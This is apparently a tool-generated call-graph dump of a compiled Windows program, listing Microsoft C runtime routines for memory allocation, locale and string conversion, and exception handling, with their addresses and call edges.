3589 8417c6 3588->3589 3595 8417e9 _strlen 3588->3595 3592 84353b _strcpy_s 63 API calls 3589->3592 3593 8417d6 3592->3593 3593->3595 3596 842ae2 __invoke_watson 10 API calls 3593->3596 3594 84182c 3651 84337c 3594->3651 3595->3594 3642 8433f0 3595->3642 3596->3595 3600 841850 3603 84337c _strcat_s 63 API calls 3600->3603 3602 842ae2 __invoke_watson 10 API calls 3602->3600 3605 841864 3603->3605 3604 842ae2 __invoke_watson 10 API calls 3604->3594 3606 841875 3605->3606 3608 842ae2 __invoke_watson 10 API calls 3605->3608 3660 843213 3606->3660 3608->3606 3698 84143a GetModuleHandleW 3609->3698 3616 8436f4 3612->3616 3614 842a2a 3614->3550 3614->3551 3615 84370b Sleep 3615->3616 3616->3614 3616->3615 3702 8454b5 3616->3702 3731 8429c6 LeaveCriticalSection 3617->3731 3619 842a9e 3619->3548 3621 8435b2 3620->3621 3622 8418cb 3621->3622 3623 842c72 strtoxl 66 API calls 3621->3623 3622->3570 3622->3572 3624 8435d5 3623->3624 3625 842c0a strtoxl 6 API calls 3624->3625 3625->3622 3627 843553 3626->3627 3628 84354c 3626->3628 3629 842c72 strtoxl 66 API calls 3627->3629 3628->3627 3633 843579 3628->3633 3630 843558 3629->3630 3631 842c0a strtoxl 6 API calls 3630->3631 3632 841794 3631->3632 3632->3588 3635 842ae2 3632->3635 3633->3632 3634 842c72 strtoxl 66 API calls 3633->3634 3634->3630 3687 845320 3635->3687 3637 842b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3638 842bdf __invoke_watson 3637->3638 3639 842beb GetCurrentProcess TerminateProcess 3637->3639 3638->3639 3689 8410cc 3639->3689 3641 8417a5 3641->3588 3647 843402 3642->3647 3643 843406 3644 842c72 strtoxl 66 API calls 3643->3644 3645 841819 3643->3645 3646 843422 3644->3646 3645->3594 3645->3604 3648 842c0a strtoxl 6 API calls 3646->3648 3647->3643 3647->3645 3649 84344c 3647->3649 3648->3645 3649->3645 3650 842c72 strtoxl 66 API calls 3649->3650 3650->3646 3652 843394 3651->3652 3655 84338d 3651->3655 3653 842c72 strtoxl 66 API calls 3652->3653 3654 843399 3653->3654 3656 842c0a strtoxl 6 API calls 3654->3656 3655->3652 3657 8433c8 3655->3657 3658 84183f 3656->3658 3657->3658 3659 842c72 strtoxl 66 API calls 3657->3659 3658->3600 3658->3602 3659->3654 3661 8420f0 __init_pointers 6 API calls 3660->3661 3662 843223 3661->3662 3663 843236 LoadLibraryA 3662->3663 3665 8432be 3662->3665 3664 84324b GetProcAddress 3663->3664 3672 843360 3663->3672 3666 843261 3664->3666 3664->3672 3669 8420f9 __decode_pointer 6 API calls 3665->3669 3682 8432e8 3665->3682 3670 84207e __encode_pointer 6 API calls 3666->3670 3667 8420f9 __decode_pointer 6 API calls 3667->3672 3668 8420f9 __decode_pointer 6 API calls 3679 84332b 3668->3679 3673 8432db 3669->3673 3671 843267 GetProcAddress 3670->3671 3674 84207e __encode_pointer 6 API calls 3671->3674 3672->3577 3675 8420f9 __decode_pointer 6 API calls 3673->3675 3676 84327c GetProcAddress 3674->3676 3675->3682 3677 84207e __encode_pointer 6 API calls 3676->3677 3678 843291 GetProcAddress 3677->3678 3680 84207e __encode_pointer 6 API calls 3678->3680 3681 8420f9 __decode_pointer 6 API calls 3679->3681 3684 843313 3679->3684 3683 8432a6 3680->3683 3681->3684 3682->3668 3682->3684 3683->3665 3685 8432b0 GetProcAddress 3683->3685 3684->3667 3686 84207e __encode_pointer 6 API calls 3685->3686 3686->3665 3688 84532c __VEC_memzero 3687->3688 3688->3637 3690 8410d4 3689->3690 3691 8410d6 IsDebuggerPresent 3689->3691 3690->3641 3697 8428d2 3691->3697 3694 841358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3695 841375 __invoke_watson 3694->3695 3696 84137d GetCurrentProcess TerminateProcess 3694->3696 3695->3696 3696->3641 3697->3694 3699 841463 ExitProcess 3698->3699 3700 84144e GetProcAddress 3698->3700 3700->3699 3701 84145e 3700->3701 3701->3699 3703 845568 3702->3703 3715 8454c7 3702->3715 3704 8431eb _realloc 6 API calls 3703->3704 3705 84556e 3704->3705 3707 842c72 strtoxl 65 API calls 3705->3707 3706 8418c4 __FF_MSGBANNER 65 API calls 3706->3715 3718 845560 3707->3718 3709 841719 __NMSG_WRITE 65 API calls 3709->3715 3710 845524 HeapAlloc 3710->3715 3711 841465 _fast_error_exit 3 API calls 3711->3715 3712 845554 3713 842c72 strtoxl 65 API calls 3712->3713 3716 845559 3713->3716 3714 8431eb _realloc 6 API calls 3714->3715 3715->3706 3715->3709 3715->3710 3715->3711 3715->3712 3715->3714 3715->3716 3715->3718 3719 845466 3715->3719 3717 842c72 strtoxl 65 API calls 3716->3717 3717->3718 3718->3616 3720 845472 __freefls@4 3719->3720 3721 8454a3 __freefls@4 3720->3721 3722 842aa0 __lock 66 API calls 3720->3722 3721->3715 3723 845488 3722->3723 3724 844dc3 ___sbh_alloc_block 5 API calls 3723->3724 3725 845493 3724->3725 3727 8454ac 3725->3727 3730 8429c6 LeaveCriticalSection 3727->3730 3729 8454b3 3729->3721 3730->3729 3731->3619 3733 844971 HeapAlloc 3732->3733 3734 84493d HeapReAlloc 3732->3734 3735 844994 VirtualAlloc 3733->3735 3736 84495b 3733->3736 3734->3736 3737 84495f 3734->3737 3735->3736 3738 8449ae HeapFree 3735->3738 3736->3491 3737->3733 3738->3736 3740 8449f1 VirtualAlloc 3739->3740 3742 844a38 3740->3742 3742->3489 3743->3494 3744->3422 3763 8429c6 LeaveCriticalSection 3745->3763 3747 84227c 3747->3432 3749 843cbc InterlockedIncrement 3748->3749 3750 843cbf 3748->3750 3749->3750 3751 843ccc 3750->3751 3752 843cc9 InterlockedIncrement 3750->3752 3753 843cd6 InterlockedIncrement 3751->3753 3754 843cd9 3751->3754 3752->3751 3753->3754 3755 843ce3 InterlockedIncrement 3754->3755 3756 843ce6 3754->3756 3755->3756 3757 843cff InterlockedIncrement 3756->3757 3758 843d0f InterlockedIncrement 3756->3758 3759 843d1a InterlockedIncrement 3756->3759 3757->3756 3758->3756 3759->3435 3764 8429c6 LeaveCriticalSection 3760->3764 3762 8422ca 3762->3437 3763->3747 3764->3762 3765->3297 3767 843808 3766->3767 3768 84382f __VEC_memcpy 3767->3768 3769 841dd3 3767->3769 3768->3769 3769->3316 3771 843694 3770->3771 3772 84368d 3770->3772 3773 842c72 strtoxl 66 API calls 3771->3773 3772->3771 3777 8436c0 3772->3777 3774 843699 3773->3774 3775 842c0a strtoxl 6 API calls 3774->3775 3776 8436a8 3775->3776 3776->3328 3777->3776 3778 842c72 strtoxl 66 API calls 3777->3778 3778->3774 3780 842dc9 3779->3780 3781 84207e __encode_pointer 6 API calls 3780->3781 3782 842de1 3780->3782 3781->3780 3782->3341 3786 842d70 3783->3786 3785 842db9 3785->3343 3787 842d7c __freefls@4 3786->3787 3794 84147d 3787->3794 3793 842d9d __freefls@4 3793->3785 3795 842aa0 __lock 66 API calls 3794->3795 3796 841484 3795->3796 3797 842c85 3796->3797 3798 8420f9 __decode_pointer 6 API calls 3797->3798 3799 842c99 3798->3799 3800 8420f9 __decode_pointer 6 API calls 3799->3800 3801 842ca9 3800->3801 3802 842d2c 3801->3802 3817 84539a 3801->3817 3814 842da6 3802->3814 3804 842d13 3805 84207e __encode_pointer 6 API calls 3804->3805 3806 842d21 3805->3806 3809 84207e __encode_pointer 6 API calls 3806->3809 3807 842ceb 3807->3802 3811 84377c __realloc_crt 73 API calls 3807->3811 3812 842d01 3807->3812 3808 842cc7 3808->3804 3808->3807 3830 84377c 3808->3830 3809->3802 3811->3812 3812->3802 3813 84207e __encode_pointer 6 API calls 3812->3813 3813->3804 3880 841486 3814->3880 3818 8453a6 __freefls@4 3817->3818 3819 8453b6 3818->3819 3820 8453d3 3818->3820 3821 842c72 strtoxl 66 API calls 3819->3821 3822 845414 HeapSize 3820->3822 3824 842aa0 __lock 66 API calls 3820->3824 3823 8453bb 3821->3823 3826 8453cb __freefls@4 3822->3826 3825 842c0a strtoxl 6 API calls 3823->3825 3827 8453e3 ___sbh_find_block 3824->3827 3825->3826 3826->3808 3835 845434 3827->3835 3834 843785 3830->3834 3832 8437c4 3832->3807 3833 8437a5 Sleep 3833->3834 3834->3832 3834->3833 3839 84569d 3834->3839 3838 8429c6 LeaveCriticalSection 3835->3838 3837 84540f 3837->3822 3837->3826 3838->3837 3840 8456a9 __freefls@4 3839->3840 3841 8456b0 3840->3841 3842 8456be 3840->3842 3843 8454b5 _malloc 66 API calls 3841->3843 3844 8456c5 3842->3844 3845 8456d1 3842->3845 3861 8456b8 _realloc __freefls@4 3843->3861 3846 8435ee ___free_lconv_mon 66 API calls 3844->3846 3851 845843 3845->3851 3874 8456de ___sbh_resize_block ___sbh_find_block 3845->3874 3846->3861 3847 845876 3849 8431eb _realloc 6 API calls 3847->3849 3848 845848 HeapReAlloc 3848->3851 3848->3861 3852 84587c 3849->3852 3850 842aa0 __lock 66 API calls 3850->3874 3851->3847 3851->3848 3853 84589a 3851->3853 3855 8431eb _realloc 6 API calls 3851->3855 3857 845890 3851->3857 3854 842c72 strtoxl 66 API calls 3852->3854 3856 842c72 strtoxl 66 API calls 3853->3856 3853->3861 3854->3861 3855->3851 3858 8458a3 GetLastError 3856->3858 3860 842c72 strtoxl 66 API calls 3857->3860 3858->3861 3863 845811 3860->3863 3861->3834 3862 845769 HeapAlloc 3862->3874 3863->3861 3864 845816 GetLastError 3863->3864 3864->3861 3865 8457be HeapReAlloc 3865->3874 3866 844dc3 ___sbh_alloc_block 5 API calls 3866->3874 3867 845829 3867->3861 3870 842c72 strtoxl 66 API calls 3867->3870 3868 8437f0 __VEC_memcpy _realloc 3868->3874 3869 8431eb _realloc 6 API calls 3869->3874 3872 845836 3870->3872 3871 84580c 3873 842c72 strtoxl 66 API calls 3871->3873 3872->3858 3872->3861 3873->3863 3874->3847 3874->3850 3874->3861 3874->3862 3874->3865 3874->3866 3874->3867 3874->3868 3874->3869 3874->3871 3875 844614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3874->3875 3876 8457e1 3874->3876 3875->3874 3879 8429c6 LeaveCriticalSection 3876->3879 3878 8457e8 3878->3874 3879->3878 3883 8429c6 LeaveCriticalSection 3880->3883 3882 84148d 3882->3793 3883->3882 3885 841561 __freefls@4 3884->3885 3886 842aa0 __lock 66 API calls 3885->3886 3887 841568 3886->3887 3888 841631 __initterm 3887->3888 3890 841594 3887->3890 3903 84166c 3888->3903 3892 8420f9 __decode_pointer 6 API calls 3890->3892 3894 84159f 3892->3894 3893 841669 __freefls@4 3893->3360 3896 841621 __initterm 3894->3896 3898 8420f9 __decode_pointer 6 API calls 3894->3898 3896->3888 3897 841660 3899 841465 _fast_error_exit 3 API calls 3897->3899 3902 8415b4 3898->3902 3899->3893 3900 8420f9 6 API calls __decode_pointer 3900->3902 3901 8420f0 6 API calls __init_pointers 3901->3902 3902->3896 3902->3900 3902->3901 3904 841672 3903->3904 3906 84164d 3903->3906 3908 8429c6 LeaveCriticalSection 3904->3908 3906->3893 3907 8429c6 LeaveCriticalSection 3906->3907 3907->3897 3908->3906 4017 844247 4027 8441cb 4017->4027 4020 844272 setSBCS 4021 8410cc __except_handler4 5 API calls 4020->4021 4022 84442a 4021->4022 4023 8442b6 IsValidCodePage 4023->4020 4024 8442c8 GetCPInfo 4023->4024 4024->4020 4025 8442db __setmbcp_nolock 4024->4025 4034 843f0d GetCPInfo 4025->4034 4044 844144 4027->4044 4030 844208 4032 84420d GetACP 4030->4032 4033 8441fa 4030->4033 4031 8441ea GetOEMCP 4031->4033 4032->4033 4033->4020 4033->4023 4033->4025 4035 843ff3 4034->4035 4038 843f41 __setmbcp_nolock 4034->4038 4040 8410cc __except_handler4 5 API calls 4035->4040 4255 845fe2 4038->4255 4042 84409e 4040->4042 4042->4025 4043 846415 ___crtLCMapStringA 101 API calls 4043->4035 4045 844157 4044->4045 4051 8441a4 4044->4051 4046 842345 __getptd 66 API calls 4045->4046 4047 84415c 4046->4047 4048 844184 4047->4048 4052 843e04 4047->4052 4048->4051 4067 8440a0 4048->4067 4051->4030 4051->4031 4053 843e10 __freefls@4 4052->4053 4054 842345 __getptd 66 API calls 4053->4054 4055 843e15 4054->4055 4056 843e43 4055->4056 4058 843e27 4055->4058 4057 842aa0 __lock 66 API calls 4056->4057 4059 843e4a 4057->4059 4060 842345 __getptd 66 API calls 4058->4060 4083 843dc6 4059->4083 4062 843e2c 4060->4062 4065 843e3a __freefls@4 4062->4065 4066 841411 __amsg_exit 66 API calls 4062->4066 4065->4048 4066->4065 4068 8440ac __freefls@4 4067->4068 4069 842345 __getptd 66 API calls 4068->4069 4070 8440b1 4069->4070 4071 842aa0 __lock 66 API calls 4070->4071 4074 8440c3 4070->4074 4072 8440e1 4071->4072 4075 84412a 4072->4075 4078 844112 InterlockedIncrement 4072->4078 4079 8440f8 InterlockedDecrement 4072->4079 4073 8440d1 __freefls@4 4073->4051 4074->4073 4076 841411 __amsg_exit 66 API calls 4074->4076 4251 84413b 4075->4251 4076->4073 4078->4075 4079->4078 4080 844103 4079->4080 4080->4078 4081 8435ee ___free_lconv_mon 66 API calls 4080->4081 4082 844111 4081->4082 4082->4078 4084 843dca 4083->4084 4085 843dfc 4083->4085 4084->4085 4086 843c9e ___addlocaleref 8 API calls 4084->4086 4091 843e6e 4085->4091 4087 843ddd 4086->4087 4087->4085 4094 843d2d 4087->4094 4250 8429c6 LeaveCriticalSection 4091->4250 4093 843e75 4093->4062 4095 843dc1 4094->4095 4096 843d3e InterlockedDecrement 4094->4096 4095->4085 4108 843b55 4095->4108 4097 843d56 4096->4097 4098 843d53 InterlockedDecrement 4096->4098 4099 843d60 InterlockedDecrement 4097->4099 4100 843d63 4097->4100 4098->4097 4099->4100 4101 843d70 4100->4101 4102 843d6d InterlockedDecrement 4100->4102 4103 843d7a InterlockedDecrement 4101->4103 4105 843d7d 4101->4105 4102->4101 4103->4105 4104 843d96 InterlockedDecrement 4104->4105 4105->4104 4106 843da6 InterlockedDecrement 4105->4106 4107 843db1 InterlockedDecrement 4105->4107 4106->4105 4107->4095 4109 843bd9 4108->4109 4115 843b6c 4108->4115 4110 8435ee ___free_lconv_mon 66 API calls 4109->4110 4111 843c26 4109->4111 4112 843bfa 4110->4112 4124 843c4d 4111->4124 4162 845ae1 4111->4162 4116 8435ee ___free_lconv_mon 66 API calls 4112->4116 4115->4109 4118 843ba0 4115->4118 4120 8435ee ___free_lconv_mon 66 API calls 4115->4120 4122 843c0d 4116->4122 4117 843bc1 4123 8435ee ___free_lconv_mon 66 API calls 4117->4123 4118->4117 4129 8435ee ___free_lconv_mon 66 API calls 4118->4129 4119 8435ee ___free_lconv_mon 66 API calls 4119->4124 4125 843b95 4120->4125 4121 843c92 4126 8435ee ___free_lconv_mon 66 API calls 4121->4126 4127 8435ee ___free_lconv_mon 66 API calls 4122->4127 4130 843bce 4123->4130 4124->4121 4128 8435ee 66 API calls ___free_lconv_mon 4124->4128 4138 845cbb 4125->4138 4132 843c98 4126->4132 4133 843c1b 4127->4133 4128->4124 4134 843bb6 4129->4134 4135 8435ee ___free_lconv_mon 66 API calls 4130->4135 4132->4085 4136 8435ee ___free_lconv_mon 66 API calls 4133->4136 4154 845c76 4134->4154 4135->4109 4136->4111 4139 845cc8 4138->4139 4153 845d45 4138->4153 4141 8435ee ___free_lconv_mon 66 API calls 4139->4141 4144 845cd9 4139->4144 4140 845ceb 4143 845cfd 4140->4143 4145 8435ee ___free_lconv_mon 66 API calls 4140->4145 4141->4144 4142 8435ee ___free_lconv_mon 66 API calls 4142->4140 4146 845d0f 4143->4146 4147 8435ee ___free_lconv_mon 66 API calls 4143->4147 4144->4140 4144->4142 4145->4143 4148 845d21 4146->4148 4150 8435ee ___free_lconv_mon 66 API calls 4146->4150 4147->4146 4149 845d33 4148->4149 4151 8435ee ___free_lconv_mon 66 API calls 4148->4151 4152 8435ee ___free_lconv_mon 66 API calls 4149->4152 4149->4153 4150->4148 4151->4149 4152->4153 4153->4118 4155 845c83 4154->4155 4161 845cb7 4154->4161 4156 8435ee ___free_lconv_mon 66 API calls 4155->4156 4158 845c93 4155->4158 4156->4158 4157 845ca5 4160 8435ee ___free_lconv_mon 66 API calls 4157->4160 4157->4161 4158->4157 4159 8435ee ___free_lconv_mon 66 API calls 4158->4159 4159->4157 4160->4161 4161->4117 4163 845af2 4162->4163 4164 843c46 4162->4164 4165 8435ee ___free_lconv_mon 66 API calls 4163->4165 4164->4119 4166 845afa 4165->4166 4167 8435ee ___free_lconv_mon 66 API calls 4166->4167 4168 845b02 4167->4168 4169 8435ee ___free_lconv_mon 66 API calls 4168->4169 4170 845b0a 4169->4170 4171 8435ee ___free_lconv_mon 66 API calls 4170->4171 4172 845b12 4171->4172 4173 8435ee ___free_lconv_mon 66 API calls 4172->4173 4174 845b1a 4173->4174 4175 8435ee ___free_lconv_mon 66 API calls 4174->4175 4176 845b22 4175->4176 4177 8435ee ___free_lconv_mon 66 API calls 4176->4177 4178 845b29 4177->4178 4179 8435ee ___free_lconv_mon 66 API calls 4178->4179 4180 845b31 4179->4180 4181 8435ee ___free_lconv_mon 66 API calls 4180->4181 4182 845b39 4181->4182 4183 8435ee ___free_lconv_mon 66 API calls 4182->4183 4184 845b41 4183->4184 4185 8435ee ___free_lconv_mon 66 API calls 4184->4185 4186 845b49 4185->4186 4187 8435ee ___free_lconv_mon 66 API calls 4186->4187 4188 845b51 4187->4188 4189 8435ee ___free_lconv_mon 66 API calls 4188->4189 4190 845b59 4189->4190 4191 8435ee ___free_lconv_mon 66 API calls 4190->4191 4192 845b61 4191->4192 4193 8435ee ___free_lconv_mon 66 API calls 4192->4193 4194 845b69 4193->4194 4195 8435ee ___free_lconv_mon 66 API calls 4194->4195 4196 845b71 4195->4196 4197 8435ee ___free_lconv_mon 66 API calls 4196->4197 4198 845b7c 4197->4198 4199 8435ee ___free_lconv_mon 66 API calls 4198->4199 4200 845b84 4199->4200 4201 8435ee ___free_lconv_mon 66 API calls 4200->4201 4202 845b8c 4201->4202 4203 8435ee ___free_lconv_mon 66 API calls 4202->4203 4204 845b94 4203->4204 4205 8435ee ___free_lconv_mon 66 API calls 4204->4205 4206 845b9c 4205->4206 4207 8435ee ___free_lconv_mon 66 API calls 4206->4207 4208 845ba4 4207->4208 4209 8435ee ___free_lconv_mon 66 API calls 4208->4209 4210 845bac 4209->4210 4211 8435ee ___free_lconv_mon 66 API calls 4210->4211 4212 845bb4 4211->4212 4213 8435ee ___free_lconv_mon 66 API calls 4212->4213 4214 845bbc 4213->4214 4215 8435ee ___free_lconv_mon 66 API calls 4214->4215 4216 845bc4 4215->4216 4217 8435ee ___free_lconv_mon 66 API calls 4216->4217 4218 845bcc 4217->4218 4219 8435ee ___free_lconv_mon 66 API calls 4218->4219 4220 845bd4 4219->4220 4221 8435ee ___free_lconv_mon 66 API calls 4220->4221 4222 845bdc 4221->4222 4223 8435ee ___free_lconv_mon 66 API calls 4222->4223 4224 845be4 4223->4224 4225 8435ee ___free_lconv_mon 66 API calls 4224->4225 4226 845bec 4225->4226 4227 8435ee ___free_lconv_mon 66 API calls 4226->4227 4228 845bf4 4227->4228 4229 8435ee ___free_lconv_mon 66 API calls 4228->4229 4230 845c02 4229->4230 4231 8435ee ___free_lconv_mon 66 API calls 4230->4231 4232 845c0d 4231->4232 4233 8435ee ___free_lconv_mon 66 API calls 4232->4233 4234 845c18 4233->4234 4235 8435ee ___free_lconv_mon 66 API calls 4234->4235 4236 845c23 4235->4236 4237 8435ee ___free_lconv_mon 66 API calls 4236->4237 4238 845c2e 4237->4238 4239 8435ee ___free_lconv_mon 66 API calls 4238->4239 4240 845c39 4239->4240 4241 8435ee ___free_lconv_mon 66 API calls 4240->4241 4242 845c44 4241->4242 4243 8435ee ___free_lconv_mon 66 API calls 4242->4243 4244 845c4f 4243->4244 4245 8435ee ___free_lconv_mon 66 API calls 4244->4245 4246 845c5a 4245->4246 4247 8435ee ___free_lconv_mon 66 API calls 4246->4247 4248 845c65 4247->4248 4249 8435ee ___free_lconv_mon 66 API calls 4248->4249 4249->4164 4250->4093 4254 8429c6 LeaveCriticalSection 4251->4254 4253 844142 4253->4074 4254->4253 4256 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4255->4256 4257 845ff5 4256->4257 4265 845e28 4257->4265 4260 846415 4261 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4260->4261 4262 846428 4261->4262 4353 846070 4262->4353 4266 845e74 4265->4266 4267 845e49 GetStringTypeW 4265->4267 4268 845e61 4266->4268 4270 845f5b 4266->4270 4267->4268 4269 845e69 GetLastError 4267->4269 4271 845ead MultiByteToWideChar 4268->4271 4282 845f55 4268->4282 4269->4266 4293 846b1a GetLocaleInfoA 4270->4293 4278 845eda 4271->4278 4271->4282 4273 8410cc __except_handler4 5 API calls 4276 843fae 4273->4276 4275 845eef __alloca_probe_16 __setmbcp_nolock 4280 845f28 MultiByteToWideChar 4275->4280 4275->4282 4276->4260 4277 845fac GetStringTypeA 4281 845fc7 4277->4281 4277->4282 4278->4275 4283 8454b5 _malloc 66 API calls 4278->4283 4285 845f3e GetStringTypeW 4280->4285 4286 845f4f 4280->4286 4287 8435ee ___free_lconv_mon 66 API calls 4281->4287 4282->4273 4283->4275 4285->4286 4289 845446 4286->4289 4287->4282 4290 845463 4289->4290 4291 845452 4289->4291 4290->4282 4291->4290 4292 8435ee ___free_lconv_mon 66 API calls 4291->4292 4292->4290 4294 846b4d 4293->4294 4296 846b48 4293->4296 4324 846b04 4294->4324 4297 8410cc __except_handler4 5 API calls 4296->4297 4298 845f7f 4297->4298 4298->4277 4298->4282 4299 846b63 4298->4299 4300 846ba3 GetCPInfo 4299->4300 4316 846c2d 4299->4316 4301 846c18 MultiByteToWideChar 4300->4301 4302 846bba 4300->4302 4307 846bd3 _strlen 4301->4307 4301->4316 4302->4301 4304 846bc0 GetCPInfo 4302->4304 4303 8410cc __except_handler4 5 API calls 4305 845fa0 4303->4305 4304->4301 4306 846bcd 4304->4306 4305->4277 4305->4282 4306->4301 4306->4307 4308 8454b5 _malloc 66 API calls 4307->4308 4312 846c05 __alloca_probe_16 __setmbcp_nolock 4307->4312 4308->4312 4309 846c62 MultiByteToWideChar 4310 846c99 4309->4310 4311 846c7a 4309->4311 4313 845446 __freea 66 API calls 4310->4313 4314 846c81 WideCharToMultiByte 4311->4314 4315 846c9e 4311->4315 4312->4309 4312->4316 4313->4316 4314->4310 4317 846cbd 4315->4317 4318 846ca9 WideCharToMultiByte 4315->4318 4316->4303 4319 843730 __calloc_crt 66 API calls 4317->4319 4318->4310 4318->4317 4320 846cc5 4319->4320 4320->4310 4321 846cce WideCharToMultiByte 4320->4321 4321->4310 4322 846ce0 4321->4322 4323 8435ee ___free_lconv_mon 66 API calls 4322->4323 4323->4310 4327 846f7a 4324->4327 4328 846f93 4327->4328 4331 846d4b 4328->4331 4332 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4331->4332 4334 846d60 4332->4334 4333 846d72 4335 842c72 strtoxl 66 API calls 4333->4335 4334->4333 4339 846daf 4334->4339 4336 846d77 4335->4336 4337 842c0a strtoxl 6 API calls 4336->4337 4342 846b15 4337->4342 4340 846df4 4339->4340 4343 8469e5 4339->4343 4341 842c72 strtoxl 66 API calls 4340->4341 4340->4342 4341->4342 4342->4296 4344 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4343->4344 4345 8469f9 4344->4345 4349 846a06 4345->4349 4350 846acc 4345->4350 4348 845fe2 ___crtGetStringTypeA 90 API calls 4348->4349 4349->4339 4351 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4350->4351 4352 846a2e 4351->4352 4352->4348 4354 846091 LCMapStringW 4353->4354 4357 8460ac 4353->4357 4355 8460b4 GetLastError 4354->4355 4354->4357 4355->4357 4356 8462aa 4358 846b1a ___ansicp 90 API calls 4356->4358 4357->4356 4359 846106 4357->4359 4362 8462d2 4358->4362 4360 84611f MultiByteToWideChar 4359->4360 4383 8462a1 4359->4383 4367 84614c 4360->4367 4360->4383 4361 8410cc __except_handler4 5 API calls 4363 843fce 4361->4363 4364 8463c6 LCMapStringA 4362->4364 4365 8462eb 4362->4365 4362->4383 4363->4043 4368 846322 4364->4368 4369 846b63 ___convertcp 73 API calls 4365->4369 4366 84619d MultiByteToWideChar 4370 8461b6 LCMapStringW 4366->4370 4371 846298 4366->4371 4373 8454b5 _malloc 66 API calls 4367->4373 4380 846165 __alloca_probe_16 4367->4380 4372 8463ed 4368->4372 4376 8435ee ___free_lconv_mon 66 API calls 4368->4376 4374 8462fd 4369->4374 4370->4371 4375 8461d7 4370->4375 4378 845446 __freea 66 API calls 4371->4378 4381 8435ee ___free_lconv_mon 66 API calls 4372->4381 4372->4383 4373->4380 4377 846307 LCMapStringA 4374->4377 4374->4383 4379 8461e0 4375->4379 4386 846209 4375->4386 4376->4372 4377->4368 4384 846329 4377->4384 4378->4383 4379->4371 4382 8461f2 LCMapStringW 4379->4382 4380->4366 4380->4383 4381->4383 4382->4371 4383->4361 4387 84633a __alloca_probe_16 __setmbcp_nolock 4384->4387 4388 8454b5 _malloc 66 API calls 4384->4388 4385 846258 LCMapStringW 4389 846270 WideCharToMultiByte 4385->4389 4390 846292 4385->4390 4391 846224 __alloca_probe_16 4386->4391 4392 8454b5 _malloc 66 API calls 4386->4392 4387->4368 4394 846378 LCMapStringA 4387->4394 4388->4387 4389->4390 4393 845446 __freea 66 API calls 4390->4393 4391->4371 4391->4385 4392->4391 4393->4371 4396 846394 4394->4396 4397 846398 4394->4397 4399 845446 __freea 66 API calls 4396->4399 4398 846b63 ___convertcp 73 API calls 4397->4398 4398->4396 4399->4368 3909 841281 3912 84283c 3909->3912 3911 841286 3911->3911 3913 842861 3912->3913 3914 84286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3912->3914 3913->3914 3915 842865 3913->3915 3914->3915 3915->3911 4400 841242 4401 841257 4400->4401 4402 841251 4400->4402 4406 8416bc 4401->4406 4403 841697 _abort 66 API calls 4402->4403 4403->4401 4405 84125c __freefls@4 4407 841555 _doexit 66 API calls 4406->4407 4408 8416c7 4407->4408 4408->4405 3916 84458d 3919 8429c6 LeaveCriticalSection 3916->3919 3918 844594 3919->3918 3979 84122e 3982 8418fe 3979->3982 3983 8422cc __getptd_noexit 66 API calls 3982->3983 3984 84123f 3983->3984 4409 8467c8 RtlUnwind 3985 8431b4 3986 8431c0 SetLastError 3985->3986 3987 8431c8 __freefls@4 3985->3987 3986->3987 3988 8426b0 3989 8426dc 3988->3989 3990 8426e9 3988->3990 3991 8410cc __except_handler4 5 API calls 3989->3991 3992 8410cc __except_handler4 5 API calls 3990->3992 3991->3990 3996 8426f9 __except_handler4 __IsNonwritableInCurrentImage 3992->3996 3993 84277c 3994 842752 __except_handler4 3994->3993 3995 84276c 3994->3995 3997 8410cc __except_handler4 5 API calls 3994->3997 3998 8410cc __except_handler4 5 API calls 3995->3998 3996->3993 3996->3994 4004 8451ca RtlUnwind 3996->4004 3997->3995 3998->3993 4000 8427cb __except_handler4 4001 8427ff 4000->4001 4002 8410cc __except_handler4 5 API calls 4000->4002 4003 8410cc __except_handler4 5 API calls 4001->4003 4002->4001 4003->3994 4004->4000 3920 841391 3921 8413cd 3920->3921 3922 8413a3 3920->3922 3922->3921 3924 8428da 3922->3924 3925 8428e6 __freefls@4 3924->3925 3930 842345 3925->3930 3931 8422cc __getptd_noexit 66 API calls 3930->3931 3932 84234d 3931->3932 3933 84235a 3932->3933 3934 841411 __amsg_exit 66 API calls 3932->3934 3935 8451fb 3933->3935 3934->3933 3936 845221 3935->3936 3937 84521a 3935->3937 3947 842f92 3936->3947 3938 841719 __NMSG_WRITE 66 API calls 3937->3938 3938->3936 3941 845232 __setmbcp_nolock 3943 84530a 3941->3943 3946 8452ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3941->3946 3971 841697 3943->3971 3946->3943 3948 8420f9 __decode_pointer 6 API calls 3947->3948 3949 842f9d 3948->3949 3949->3941 3950 842f9f 3949->3950 3954 842fab __freefls@4 3950->3954 3951 843007 3952 842fe8 3951->3952 3957 843016 3951->3957 3956 8420f9 __decode_pointer 6 API calls 3952->3956 3953 842fd2 3955 8422cc __getptd_noexit 66 API calls 3953->3955 3954->3951 3954->3952 3954->3953 3958 842fce 3954->3958 3959 842fd7 _siglookup 3955->3959 3956->3959 3960 842c72 strtoxl 66 API calls 3957->3960 3958->3953 3958->3957 3963 84307d 3959->3963 3964 841697 _abort 66 API calls 3959->3964 3970 842fe0 __freefls@4 3959->3970 3961 84301b 3960->3961 3962 842c0a strtoxl 6 API calls 3961->3962 3962->3970 3965 842aa0 __lock 66 API calls 3963->3965 3966 843088 3963->3966 3964->3963 3965->3966 3967 8420f0 __init_pointers 6 API calls 3966->3967 3968 8430bd 3966->3968 3967->3968 3974 843113 3968->3974 3970->3941 3972 841555 _doexit 66 API calls 3971->3972 3973 8416a8 3972->3973 3975 843120 3974->3975 3976 843119 3974->3976 3975->3970 3978 8429c6 LeaveCriticalSection 3976->3978 3978->3975 4005 84543d 4006 841411 __amsg_exit 66 API calls 4005->4006 4007 845444 4006->4007 4458 8428fe 4459 842901 4458->4459 4460 8451fb _abort 68 API calls 4459->4460 4461 84290d __freefls@4 4460->4461 4008 842d3f 4009 843730 __calloc_crt 66 API calls 4008->4009 4010 842d4b 4009->4010 4011 84207e __encode_pointer 6 API calls 4010->4011 4012 842d53 4011->4012 4410 84235f 4412 84236b __freefls@4 4410->4412 4411 842383 4415 8435ee ___free_lconv_mon 66 API calls 